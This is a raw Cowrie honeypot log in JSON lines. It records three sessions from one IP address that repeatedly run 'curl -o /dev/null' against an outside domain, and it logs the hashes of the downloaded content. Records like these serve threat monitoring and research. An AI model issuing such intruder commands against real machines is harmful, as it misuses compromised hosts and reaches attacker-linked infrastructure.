{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.079171Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.081558Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.084330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.086508Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.087741Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.088347Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.092510Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.093221Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.095055Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.108570Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.155608Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.158785Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.160360Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.161000Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.163968Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.164474Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.167562Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.169232Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.170785Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.171406Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.206692Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.207736Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.208150Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.211032Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.214314Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.215881Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.216828Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.218301Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.218736Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.245834Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.247829Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.250068Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.251164Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.251862Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.256093Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.257262Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.258680Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.259383Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.292505Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.294755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.298215Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.300250Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.301289Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.303874Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.304329Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.305430Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.305821Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.341557Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.343561Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.346331Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.349204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.350018Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.353187Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.354040Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.356880Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.358164Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.363776Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.392172Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.394168Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.397099Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.398117Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.401267Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.402204Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.406372Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.407544Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.437253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.439338Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.442029Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.443261Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.444078Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.446972Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.447596Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.450183Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.450738Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.484306Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.485453Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.486047Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.490563Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
